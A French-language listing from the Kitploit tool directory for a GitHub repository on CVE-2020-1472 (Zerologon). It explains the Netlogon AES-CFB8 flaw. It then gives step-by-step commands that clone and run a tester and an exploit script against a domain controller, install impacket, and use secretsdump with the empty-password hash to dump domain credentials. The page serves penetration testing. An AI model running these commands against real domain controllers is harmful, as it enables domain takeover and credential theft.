Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/murataydemir/cve-2020-1472
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionAuthentificationRed Teaming
GitHubmurataydemir/cve-2020-1472

CVE-2020-1472

[CVE-2020-1472] Appel de protocole distant Netlogon (MS-NRPC) Élévation de privilèges (Zerologon)

Voir le dépôt
123il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

[CVE-2020-1472] Élévation de privilège via l'appel de protocole distant Netlogon (MS-NRPC) (Zerologon)

L'attaque décrite ici exploite des failles dans un protocole d'authentification cryptographique (utilisation non sécurisée d'AES-CFB8) qui prouve l'authenticité et l'identité d'un ordinateur joint au domaine auprès du contrôleur de domaine (DC). En raison d'une utilisation incorrecte d'un mode de fonctionnement AES, il est possible d'usurper l'identité de n'importe quel compte d'ordinateur (y compris celui du DC lui-même) et de définir un mot de passe vide (simplement en envoyant un certain nombre de messages Netlogon dont divers champs sont remplis de zéros) pour ce compte dans le domaine. Cela peut ensuite être utilisé pour obtenir les identifiants d'administrateur du domaine, puis restaurer le mot de passe d'origine du DC.

Pour vérifier CVE-2020-1472

  • git clone https://github.com/SecuraBV/CVE-2020-1472.git
  • cd CVE-2020-1472
  • python3 -m venv env
  • source env/bin/activate
  • pip install -r requirements.txt
  • python zerologon_tester.py EXAMPLE-DC 1.2.3.4 (exemple : ./zerologon_tester.py DC01 172.16.208.161)

Pour exploiter CVE-2020-1472

  • git clone https://github.com/dirkjanm/CVE-2020-1472.git
  • cd CVE-2020-1472
  • python3 -m venv env
  • source env/bin/activate
  • python cve-2020-1472-exploit.py EXAMPLE-DC 1.2.3.4 (exemple : ./cve-2020-1472-exploit.py DC01 172.16.208.161)
  • git clone https://github.com/SecureAuthCorp/impacket.git
  • cd impacket
  • pip install .
  • python setup.py install
  • cd examples

Ensuite, exécutez l'une des commandes suivantes

Exemple format 1 : python secretsdump.py domain/example-dc$@fqdn-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
Exemple format 2 : python secretsdump.py domain/example-dc$@ip-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc

Image of PoC

Le billet de blog original est disponible ici
Le dépôt original contenant le script de test Python est disponible ici
Le dépôt original contenant le script d'exploitation Python est disponible ici

Télécharger l’outil